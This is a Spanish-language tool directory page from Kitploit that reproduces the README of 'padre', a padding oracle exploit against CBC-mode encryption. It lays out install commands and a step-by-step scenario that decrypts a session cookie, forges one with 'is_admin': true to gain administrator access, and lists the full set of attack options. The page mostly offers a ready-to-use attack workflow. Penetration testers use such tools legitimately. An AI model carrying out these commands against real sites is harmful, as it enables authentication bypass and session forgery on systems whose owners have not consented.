Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
padre — Exploit de Oracle de Relleno avanzado y ultrarrápido. | Kitploit
Herramientas/GitHubGitHub/glebarez/padre
ExplotaciónSeguridad WebCriptografíaPruebas de Penetración
GitHubglebarez/padre

padre

Exploit de Oracle de Relleno avanzado y ultrarrápido.

Ver Repositorio
280287hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Publish release

padre

padre es un explotador avanzado para ataques de Padding Oracle contra el modo de cifrado CBC

Características:

  • implementación ultrarrápida y concurrente
  • descifrado de tokens
  • cifrado de datos arbitrarios
  • huella digital automática de oráculos de relleno
  • detección automática de la longitud del bloque de cifrado
  • ¡PISTAS! si ocurre un fallo durante las operaciones, padre te sugerirá qué se puede ajustar para tener éxito
  • admite tokens en parámetros GET/POST, Cookies
  • especificación flexible de reglas de codificación (base64, hex, etc.)

Demo

demo

Instalación/Actualización

  • La forma más rápida es descargar el binario precompilado para tu sistema operativo desde la Última versión

  • Alternativamente, si tienes Go instalado, compila desde el código fuente:

root@kitploit:~
go install github.com/glebarez/padre@latest
Descargar herramienta

Escenario de uso

Si encuentras un supuesto oráculo de relleno, donde los datos cifrados están almacenados dentro de una cookie llamada SESS, puedes usar lo siguiente:

root@kitploit:~
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='

padre detectará automáticamente las respuestas HTTP para determinar si se puede confirmar el oráculo de relleno. Si el servidor es efectivamente vulnerable, el token proporcionado se descifrará en algo como:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

¡Parece que podrías escalar tus privilegios aquí!

Puedes intentarlo generando primero tus propios datos cifrados que el oráculo descifrará de vuelta a un texto plano engañoso:

root@kitploit:~
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' -enc '{"user_id": 456, "is_admin": true}'

Esto generará otro conjunto de datos cifrados codificados, quizás algo como lo siguiente (si se usa base64):

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Ahora puedes abrir tu navegador y establecer el valor de la cookie SESS al valor anterior. Al cargar la página original del oráculo, deberías ver que has sido elevado a nivel de administrador.

Impacto de los oráculos de relleno

  • revelar información de sesión cifrada
  • eludir la autenticación
  • proporcionar tokens falsos que el servidor aceptará
  • en general, ampliar considerablemente la superficie de ataque

Opciones de uso completo

root@kitploit:~
Usage: padre [OPTIONS] [INPUT]

INPUT: 
	En modo descifrado: datos cifrados
	En modo cifrado: el texto plano a cifrar
	Si no se pasa, se leerá de STDIN

	NOTA: los datos binarios siempre están codificados en HTTP. Ajusta las reglas de codificación si es necesario (ver opciones: -e, -r)

OPTIONS:

-u *obligatorio*
	URL objetivo, usa el carácter $ para definir el marcador de posición del token (si está presente en la URL)

-enc
	Modo cifrado

-err
	Patrón de expresión regular, las respuestas HTTP se compararán con esto para detectar el oráculo de relleno. Omitir para realizar huella digital automática

-e
	Codificación a aplicar a los datos binarios. Valores admitidos:
		b64 (base64 estándar) *predeterminado*
		lhex (hexadecimal en minúsculas)

-r
	Reemplazos adicionales a aplicar después de codificar los datos binarios. Usa cadenas de longitud impar, formadas por pares de caracteres <ANTIGUO><NUEVO>.
	Ejemplo:
		Si el servidor usa base64, pero reemplaza '/' con '!', '+' con '-', '=' con '~', entonces usa -r "/!+-=~"

-cookie
	Valor de la cookie a establecer en las solicitudes HTTP. Usa el carácter $ para marcar el marcador de posición del token.

-post
	Datos de cadena para realizar solicitudes POST. Usa el carácter $ para marcar el marcador de posición del token. 

-ct
	Content-Type para solicitudes POST. Si no se especifica, se determinará automáticamente.
	
-b
	Longitud del bloque utilizada en el cifrado (usa 16 para AES). Omitir para realizar detección automática. Valores admitidos:
		8
		16 *predeterminado*
		32

-p
	Número de conexiones HTTP paralelas establecidas al servidor objetivo [1-256]
		30 *predeterminado*
		
-proxy
	Proxy HTTP. Ejemplo: usa -proxy "http://localhost:8080" para Burp o ZAP

Lectura adicional

  • https://blog.skullsecurity.org/2013/a-padding-oracle-example
  • https://blog.skullsecurity.org/2016/going-the-other-way-with-padding-oracles-encrypting-arbitrary-data

Herramientas alternativas

  • https://github.com/liamg/pax
  • https://github.com/AonCyberLabs/PadBuster